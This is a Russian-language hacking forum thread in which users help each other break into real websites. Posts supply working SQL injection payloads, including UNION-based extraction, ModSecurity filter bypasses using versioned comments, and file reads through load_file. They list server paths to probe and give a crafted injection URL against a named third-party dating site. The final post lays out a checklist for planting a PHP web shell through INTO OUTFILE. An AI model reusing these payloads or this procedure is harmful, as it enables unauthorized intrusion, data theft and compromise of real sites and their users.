Доброго времени суток, уважаемые форумчане! Вы не могли бы помочь мне восполнить пробелы в моих знаниях?-) Дело в том, что никак не могу затить шелл через админку(сайт на джумле), так как доступ к установке чего-либо закрыт, редактирование языков и тд тоже, ну и глобальные настройки само собой... Можно только заливать картинки... Собственно вопрос: Можно ли каким-либо образом подменить майм-тайп у отправляемого мною шелла, без замены расширения? Дело в том, что инклудов я на сайте не нашел... Заранее благодарю за помощь...
Не подскажете, как обойти фильтрацию. module.php?id=104+union+select+1,version(),3,4--+ выводит 5.0.91-community проверяю module.php?id=104+union+select+1,2,version(),3,4+from+information_schema.tables--+ выводит версию, columns так же Когда пытаюсь вывести таблицы table_name перебрасывает на страницу column_name так же и из information_schema.columns Выводится только table_schema (information_schema.tables/columns), остальное видимо фильтруется. Пробовал обойти CoLuMn_NaMe cOlUmN_nAme и т.д. c table_name так же. Перебрасывает на 406 Not Acceptable Подскажите как обойти фильтрацию. Заранее благодарен.
Так и должно быть и нету тут фильтрации module.php?id=104+union+select+1,version(),3,4--+ Это правильный запрос.
попугай прав. Зачем мне одна версия, имя бд и юзер. Мне нужна инфа о таблицах и колонках из information_schema.tables и information_schema.columns Фильтруются при запросе column_name и table_name table_schema нет, но этого мало. Иначе зачем мне уязвимость?
2 auth_root Mod_Security Code: module.php?id=104+union+select+1,/*!table_name*/,3,4+from+information_schema.tables Code: module.php?id=104+union+select+1,/*12345!table_name*/,3,4+from+information_schema.tables Либо сразу весь запрос загони в комментарии.
Есть сайт с mysql, file_priv=Y, нет раскрытия путей... Нужно узнать путь для заливки шелла через sql inj. Система - Windows. Есть возможность читать файлы вот так: id=-1+union+select+1,2,load_file(0x633a5c626f6f742e696e69),4+--+ где 0x633a5c626f6f742e696e69 - C:/boot.ini Инклуд тоже не нашел, иначе бы в C:/ файл и залил. Нужно перебором найти папку с сайтом, но я не знаю, где обычно в Windows-серверах располагают сайты. Наверняка это где-то уже обсуждалось, но не могу найти... Или какой файл можно поискать, в котором может быть написано, куда установлен mysql или apache (в C:/ и C:/Program Files искал, но, видимо, их там нет)? Может, еще какие идеи? Сталкиваюсь с таким в первый раз, потерялся))
brutos попробуй c:\wwwroot\имя сайта\ c:\wwwroot\имя сайта\htdocs\ c:\wwwroot\имя сайта\www\ c:\wwwroot\htdocs\ и т.д.
вот из такого что-то выжать можно? http://partnervanjedromen.nl/search_result.php?Sex=Female%27&LookingFor=female&DateOfBirth_start=19&DateOfBirth_end=44 или подскажите где почитать инфу
http://partnervanjedromen.nl/search_result.php?Sex=Female') and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+&LookingFor=female&DateOfBirth_start=19&DateOfBirth_end=44
пробуй варианты C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log C:\Program Files\MySQL\data\hostname.err C:\Program Files\MySQL\data\mysql.log C:\Program Files\MySQL\data\mysql.err C:\Program Files\MySQL\data\mysql-bin.log C:\MySQL\data\hostname.err C:\MySQL\data\mysql.log C:\MySQL\data\mysql.err C:\MySQL\data\mysql-bin.log C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.cnf C:\Program Files\MySQL\my.ini C:\Program Files\MySQL\my.cnf C:\MySQL\my.ini C:\MySQL\my.cnf
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на залифку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ? P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).
https://forum.antichat.ru/thread43966.html Пункт 2.2 Проверить привилегии на запись можно вот так: N - no = нет прав Y - yes = есть права
Попробуй поискать инклюды в админке. Для заливки шелла через инжект Проверь эти пункты: 1. Экранирование ковычек он же magic_quotes_qpc. Эта шняга должна быть установлена на off в php.ini. Попробуй в любое поле вписать текст 'lol' и если запрос обработается успешно и выведет "lol", то по первому пункту проходит. 2. Права доступа к счеме mysql. Попробуй вывести что угодно, даже циферки из mysql.user. Пример : UNION SELECT 1,2,3 from mysql.user. Если запрос обработается также как и при UNION SELECT 1,2,3, то по этому пункту тоже проходит. 3. file_priv. Сперва узнаем через какого юзера мы подключены к бд. Для этого отправляем запрос UNION SELECT user(),2,3. Например нам вывело root@localhost. Теперь проверяем file_priv у нашего юзера - select file_priv,2,3 from mysql.user where user='root' (если magic_quotes_qpc=on, то root заменить на хекс - 0x726F6F74. Соответственно мы тогда не проходим по 1 пункту, но зато можем читать файлы через функцию load_file). Если выдало Y - у нашего юзера есть файл привелигии и мы проходим по этому пункту else не проходим 4. Путь. Мы должны знать полный путь от корня сервера. например: /home/www/site/ 5. Возможность запись в папку. Если не пишется в /home/www/site/ можно попробовать записать в /home/www/site/images/ к примеру. Собственно как лить : union select 'наш пхп код',2,3 from mysql.user into outfile '/home/www/site/images/lol.php' . Если по всем вышеперечисленным пунктам все ок и вы сделали все правильно, то по адресу http://site/images/lol.php будет лежать наш файлиг. Если что-то непонятно пиши в пм - всегда рад помочь
